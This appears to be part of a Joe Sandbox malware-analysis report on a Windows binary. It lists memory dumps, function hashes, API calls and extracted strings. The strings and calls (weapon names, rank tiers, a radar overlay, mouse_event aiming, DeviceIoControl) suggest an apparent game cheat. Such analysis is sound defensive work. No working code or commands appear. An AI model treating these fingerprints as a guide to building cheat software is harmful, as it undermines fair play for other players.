                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                        • String ID: Bronze 1
                                                                                                                                                                        • API String ID: 3063020102-604619507
                                                                                                                                                                        • Opcode ID: 784a189a8e0b0256d503e7cce5ff8cea9137e8d93570346a003d7ee83faaa714
                                                                                                                                                                        • Instruction ID: 48d5bb87fc85616627d33a070a6cea9b6b5c934656facd6a7207a5ea2c49b82f
                                                                                                                                                                        • Opcode Fuzzy Hash: 784a189a8e0b0256d503e7cce5ff8cea9137e8d93570346a003d7ee83faaa714
                                                                                                                                                                        • Instruction Fuzzy Hash: 6182F522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                        • String ID: Diamond 3
                                                                                                                                                                        • API String ID: 3063020102-2523521028
                                                                                                                                                                        • Opcode ID: 46fab210265880830ab19984097468dc3db615d44e86d4d5ece7f537af17b6d9
                                                                                                                                                                        • Instruction ID: 5d502974779ecd992d5b80333815c9dd89ebc1651bfee0af83fe9f015424f884
                                                                                                                                                                        • Opcode Fuzzy Hash: 46fab210265880830ab19984097468dc3db615d44e86d4d5ece7f537af17b6d9
                                                                                                                                                                        • Instruction Fuzzy Hash: AC82F522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                        • String ID: Diamond 2
                                                                                                                                                                        • API String ID: 3063020102-3782135954
                                                                                                                                                                        • Opcode ID: d13cdcc71c72fcc3cc0c6c25b338116d2a39bfa36fcf1b18389b788f3c62f361
                                                                                                                                                                        • Instruction ID: 36cfef8c9322ca2cd7e98fbd6a8c14db7981b09b694a8ab0c6dbee83c92df959
                                                                                                                                                                        • Opcode Fuzzy Hash: d13cdcc71c72fcc3cc0c6c25b338116d2a39bfa36fcf1b18389b788f3c62f361
                                                                                                                                                                        • Instruction Fuzzy Hash: ED82F522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                        • String ID: Diamond 1
                                                                                                                                                                        • API String ID: 3063020102-2020049192
                                                                                                                                                                        • Opcode ID: 74257927fbdaa401454e939cbcad83ad7f18b429a0895a0b656e7edb21656777
                                                                                                                                                                        • Instruction ID: 8331c66de58becef451294f0e0f50e2a608cf8270fd51d7e86c2815b6520779e
                                                                                                                                                                        • Opcode Fuzzy Hash: 74257927fbdaa401454e939cbcad83ad7f18b429a0895a0b656e7edb21656777
                                                                                                                                                                        • Instruction Fuzzy Hash: 9282F522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                        • String ID: Platinum 3
                                                                                                                                                                        • API String ID: 3063020102-3689681476
                                                                                                                                                                        • Opcode ID: 9450d16a5c0a5aad9f456832ff4794e1ce77669376ff6370247aa281e6cf2dcc
                                                                                                                                                                        • Instruction ID: e460708cc7773a4f27d915457932beec6822e92a6909047b5486a87e0a5d1620
                                                                                                                                                                        • Opcode Fuzzy Hash: 9450d16a5c0a5aad9f456832ff4794e1ce77669376ff6370247aa281e6cf2dcc
                                                                                                                                                                        • Instruction Fuzzy Hash: 3282F522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                        • String ID: Platinum 2
                                                                                                                                                                        • API String ID: 3063020102-2901091026
                                                                                                                                                                        • Opcode ID: 1d8f003122154799508665ed9e1175e9d30b19f98df83f7ff8c2deecfdf59ddc
                                                                                                                                                                        • Instruction ID: f00937af820d77eaab4301c0bbd8632818ece7cc11e3482571dd04cb43546af4
                                                                                                                                                                        • Opcode Fuzzy Hash: 1d8f003122154799508665ed9e1175e9d30b19f98df83f7ff8c2deecfdf59ddc
                                                                                                                                                                        • Instruction Fuzzy Hash: F282F522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                        • String ID: Platinum 1
                                                                                                                                                                        • API String ID: 3063020102-904033128
                                                                                                                                                                        • Opcode ID: 5177fae08f27499764e2b11314329b5ea7c10f370f8685fba5808235796114f1
                                                                                                                                                                        • Instruction ID: 88d459f530565f0965a9417c23cb30b23ec309f931cd604e3db4af3923cb5f53
                                                                                                                                                                        • Opcode Fuzzy Hash: 5177fae08f27499764e2b11314329b5ea7c10f370f8685fba5808235796114f1
                                                                                                                                                                        • Instruction Fuzzy Hash: 2382F522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                        • String ID: Gold 3
                                                                                                                                                                        • API String ID: 3063020102-2894533912
                                                                                                                                                                        • Opcode ID: 6afc31ce1e04bede69752e8b3a73d96e521f72a87040a677a00a5781ed6ab9d6
                                                                                                                                                                        • Instruction ID: 0a2d618ceb64b6c997b33e3e3faf01f7fb801943269f467885089f6df17d73eb
                                                                                                                                                                        • Opcode Fuzzy Hash: 6afc31ce1e04bede69752e8b3a73d96e521f72a87040a677a00a5781ed6ab9d6
                                                                                                                                                                        • Instruction Fuzzy Hash: FB82F522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                        • String ID: Gold 2
                                                                                                                                                                        • API String ID: 3063020102-3682608526
                                                                                                                                                                        • Opcode ID: 511e3042c2013622ce6a675ac7ef6ff89e6d06691a8666c6a6b78c63dc5e3316
                                                                                                                                                                        • Instruction ID: 88d6ca8e3bb1152f118aef24e089becfa682e77bc851e9d87ee38bdcde2adab5
                                                                                                                                                                        • Opcode Fuzzy Hash: 511e3042c2013622ce6a675ac7ef6ff89e6d06691a8666c6a6b78c63dc5e3316
                                                                                                                                                                        • Instruction Fuzzy Hash: 5582F522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF786612E10: DeviceIoControl.KERNEL32 ref: 00007FF786612ECD
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661E86A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ControlDevice_invalid_parameter_noinfo_noreturn
                                                                                                                                                                        • String ID: Assault Rifle$Bolt-Action Sniper Rifle$Burst Assault Rifle$Charge Shotgun$Compact SMG$Heavy Sniper Rifle$Hunting Rifle$Pump Shotgun$Rapid Fire SMG$Reaper Sniper Rifle$Rifl$Scoped Assault Rifle$Shot$Snip$Storm Scout Sniper Rifle$Suppressed SMG$Tactical Assault Rifle$Tactical Shotgun$Thermal Scoped Assault Rifle
                                                                                                                                                                        • API String ID: 4009212252-766504981
                                                                                                                                                                        • Opcode ID: 90ebe4b467c330f6f7898888e507790d239e3f002e9bde2ff3291c7a76b3b3da
                                                                                                                                                                        • Instruction ID: 90d1136f885cfa3bd7b607daedeefba71f296d638cddbcc4611c12c3cde0a79f
                                                                                                                                                                        • Opcode Fuzzy Hash: 90ebe4b467c330f6f7898888e507790d239e3f002e9bde2ff3291c7a76b3b3da
                                                                                                                                                                        • Instruction Fuzzy Hash: C152F761F086C665FA21AB399C043FAA362BF55754FA44333D91D266D1EF28FD81CB20
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: StateWindow$Client$AsyncCursorMessageScreen$Rect$ActiveCounterDestroyDispatchForegroundPeekPerformanceQueryTranslatefreerand
                                                                                                                                                                        • String ID: ##radar$Hands$Nearby Entities: $Unranked$VUUU$Visible Entities:
                                                                                                                                                                        • API String ID: 460599277-1119963227
                                                                                                                                                                        • Opcode ID: 6f55e7e6eb818f88b9cc76e3a2dc8329fd7562ec4526b68fdbd10c78b8c7bb01
                                                                                                                                                                        • Instruction ID: 57c4146d2be7a879d615529173893cdfae97014eb474072c5d5968d3a300f0e4
                                                                                                                                                                        • Opcode Fuzzy Hash: 6f55e7e6eb818f88b9cc76e3a2dc8329fd7562ec4526b68fdbd10c78b8c7bb01
                                                                                                                                                                        • Instruction Fuzzy Hash: 4F324B35B18AC2A6FB00EF25DC5467AB3B2FB44B44FA44236D90D537A4CF2CA944CB21
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Close$ErrorFileFindHandleLast$AttributesFirst__std_fs_open_handleabort
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4293554670-0
                                                                                                                                                                        • Opcode ID: 7159fc5b1a6647880897efde78f54b595061372dc9ef2afea58026139ae63b91
                                                                                                                                                                        • Instruction ID: 024af417f2a972b42bbde305eb010eb7647baabffe4206064e1e58fe04dd2bfc
                                                                                                                                                                        • Opcode Fuzzy Hash: 7159fc5b1a6647880897efde78f54b595061372dc9ef2afea58026139ae63b91
                                                                                                                                                                        • Instruction Fuzzy Hash: 4E91C331B08A8256E760AB25AC14277A293BF54BB4FA44330D9AD477D4DF7CEC05CB21
                                                                                                                                                                        APIs
                                                                                                                                                                        • pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF78661F1B5
                                                                                                                                                                        • pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF78661F1D0
                                                                                                                                                                        • pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF78661F1E9
                                                                                                                                                                        • sqrt.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF78661F207
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661F307
                                                                                                                                                                          • Part of subcall function 00007FF78662CA38: AcquireSRWLockExclusive.KERNEL32(?,?,?,00007FF7865F2AC0), ref: 00007FF78662CA48
                                                                                                                                                                        • mouse_event.USER32 ref: 00007FF78661F2A9
                                                                                                                                                                          • Part of subcall function 00007FF78661E8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF7866118E5), ref: 00007FF78661E8F8
                                                                                                                                                                          • Part of subcall function 00007FF78661E8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF7866118E5), ref: 00007FF78661E998
                                                                                                                                                                          • Part of subcall function 00007FF78661E8C0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF78661E9B6
                                                                                                                                                                          • Part of subcall function 00007FF78661E8C0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7866118E5), ref: 00007FF78661E975
                                                                                                                                                                          • Part of subcall function 00007FF78662CFB4: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF78662B985,?,?,?,?,?,00007FF786629EF5), ref: 00007FF78662CFCE
                                                                                                                                                                        • mouse_event.USER32 ref: 00007FF78661F2C1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturnmemcpymouse_event$AcquireConcurrency::cancel_current_taskExclusiveLockmallocsqrt
                                                                                                                                                                        • String ID: AutoShotgun$ChargeShotgun$CombatShotgun$DoubleBarrelShotgun$DragonBreathShotgun$LeverActionShotgun$PumpShotgun$SingleShotgun$SlugShotgun$TacticalShotgun
                                                                                                                                                                        • API String ID: 2172613484-4283324268
                                                                                                                                                                        • Opcode ID: 6130bf9ae6b3f381fa2ce4abc62b5a03a49e19c7598ae3ffa829a659d672f3a8
                                                                                                                                                                        • Instruction ID: e43425fa2b5b255bf618e827402b653fa6a0bd170db66aa52d84e3b0b29a596c
                                                                                                                                                                        • Opcode Fuzzy Hash: 6130bf9ae6b3f381fa2ce4abc62b5a03a49e19c7598ae3ffa829a659d672f3a8
                                                                                                                                                                        • Instruction Fuzzy Hash: 9602E762F14BC6A5E710EB35DC413FAA362BF95794FA05332E95C22695EF38E980C710
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: free$malloc$memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1620901979-0
                                                                                                                                                                        • Opcode ID: be5415dcf8b1c2700579f5f15daabd33cabd424ebe063dd0a36447333c6c5eb0
                                                                                                                                                                        • Instruction ID: c456f0e9bcf240bb4939d2a58930f6dc1ba4c13e169c0322cd8add770b1c3999
                                                                                                                                                                        • Opcode Fuzzy Hash: be5415dcf8b1c2700579f5f15daabd33cabd424ebe063dd0a36447333c6c5eb0
                                                                                                                                                                        • Instruction Fuzzy Hash: ADB2E032B047809AE755EF26E4406BEB7A1FB48B88F548336DE4963754DF38E895CB10
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
